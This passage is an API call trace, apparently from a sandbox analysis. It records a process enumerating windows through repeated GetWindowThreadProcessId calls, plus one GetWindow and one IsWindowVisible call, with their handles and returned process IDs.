	[0363.853] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xe34
	[0363.853] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xea4
	[0363.853] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x514
	[0363.853] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xe48
	[0363.853] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xbc8
	[0363.853] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xdf8
	[0363.854] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x318
	[0363.854] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xcac
	[0363.854] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x8bc
	[0363.854] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xf9c
	[0363.854] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xf48
	[0363.854] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xe40
	[0363.854] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xecc
	[0363.854] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xeb8
	[0363.854] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xe80
	[0363.854] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xe98
	[0363.854] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xe60
	[0363.855] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xee4
	[0363.855] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xf00
	[0363.855] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xdf0
	[0363.855] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xe1c
	[0363.855] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xdd0
	[0363.855] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xd94
	[0363.855] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xd74
	[0363.855] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xd00
	[0363.855] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xcd8
	[0363.855] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xc84
	[0363.855] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xca4
	[0363.856] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xc64
	[0363.856] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xc24
	[0363.856] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xb84
	[0363.856] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xbac
	[0363.856] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x384
	[0363.856] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xab8
	[0363.856] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x33c
	[0363.856] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xa44
	[0363.856] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xa64
	[0363.856] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x8a8
	[0363.856] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xaf0
	[0363.857] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x88c
	[0363.857] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xb04
	[0363.883] GetWindow (hWnd=0x102bc, uCmd=0x4) returned 0x0
	[0363.884] IsWindowVisible (hWnd=0x102bc) returned 0
	[0363.884] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x910
	[0363.884] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x230
	[0363.884] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xac0
	[0363.884] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xab4
	[0363.884] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xaac
	[0363.884] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x3d0
	[0363.884] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x978
	[0363.885] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xa7c
	[0363.885] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x59c
	[0363.885] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xa88
	[0363.885] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xa6c
	[0363.885] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xa68
	[0363.885] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x9f8
	[0363.885] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xa04
	[0363.885] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x924
	[0363.885] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x8dc
	[0363.885] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x7dc
	[0363.885] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x768
	[0363.886] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x764
	[0363.886] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x820
	[0363.886] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x810
	[0363.886] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x794
	[0363.886] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x83c
	[0363.886] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x7ac
	[0363.886] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xb44
	[0363.886] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xb5c
	[0363.886] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x838
	[0363.886] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.887] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.887] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.887] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.887] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.887] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.887] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.887] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.887] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x818
	[0363.887] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x5b8
	[0363.887] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x494
	[0363.887] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x1ec
	[0363.888] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x440
	[0363.888] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x7e8
	[0363.888] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x730
	[0363.888] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x2c8
	[0363.888] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x31c
	[0363.888] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x330
	[0363.888] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x128
	[0363.888] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x5c8
	[0363.888] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x6f8
	[0363.888] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x358
	[0364.034] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x73c
	[0364.034] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xb0
	[0364.034] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x250
	[0364.034] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x240
	[0364.034] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x790
	[0364.034] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x61c
	[0364.035] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x540
	[0364.035] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x538
	[0364.035] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x568
	[0364.035] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x538
	[0364.035] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x568
	[0364.035] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x538
	[0364.035] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x540
	[0364.035] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x540
	[0364.035] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x57c
	[0364.035] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x460
	[0364.035] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x554
	[0364.036] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0364.036] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x528
	[0364.036] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0364.036] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0364.036] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0364.036] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x79c
	[0364.036] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0364.036] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4e0
	[0364.036] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0364.036] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x460
	[0364.036] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x460
	[0364.037] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x44c
	[0364.037] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x778
	[0364.037] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x460
	[0364.037] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x558
	[0364.037] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0364.037] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0364.037] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xe6c
	[0364.037] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x6e8
	[0364.037] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xc6c
	[0364.038] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xf94
	[0364.038] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xffc
	[0364.038] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xf74
	[0364.038] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xf08
	[0364.038] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xf0c
	[0364.038] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xed8
	[0364.038] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xe90
	[0364.038] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xea8
	[0364.038] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xfa8
	[0364.038] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xfbc
	[0364.038] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xfb8
	[0364.039] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xfb4
	[0364.039] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xfb0
	[0364.039] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xfac
	[0364.039] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xfc0
	[0364.039] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xfd0
	[0364.039] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xf88
	[0364.039] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xf84
	[0364.039] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xf80
	[0364.039] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xde0
	[0364.039] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xddc
	[0364.039] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xdd8
	[0364.040] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xd34
	[0364.040] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xd10
	[0364.040] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xd0c
	[0364.040] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xc9c
	[0364.040] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xc74
	[0364.040] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xc1c
	[0364.040] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xc08
	[0364.040] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xabc
	[0364.040] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x24c
	[0364.040] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xbb0
	[0364.040] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xbfc
	[0364.041] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xb10
	[0364.041] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x374
	[0364.041] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x368
	[0364.041] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xb28
	[0364.041] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xae8
	[0364.041] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xb14
	[0364.041] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x95c
	[0364.041] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xa8c
	[0364.041] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x46c
	[0364.041] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xb3c
	[0364.041] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xa90
	[0364.041] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xad0
	[0364.041] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xa9c
	[0364.041] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xaa0
	[0364.042] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xb1c
	[0364.042] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x7e0
	[0364.042] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xa74
	[0364.042] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x694
	[0364.042] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xa28
	[0364.042] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x9b0
	[0364.042] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x8d8
	[0364.042] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x940
	[0364.042] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x93c
	[0364.042] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4ec
	[0364.042] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x150
	[0364.042] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x720
	[0364.042] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x3c4
	[0364.043] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x7d4
	[0364.043] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x6c8
	[0364.043] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xb54
	[0364.043] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xb54
	[0364.043] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0xb5c
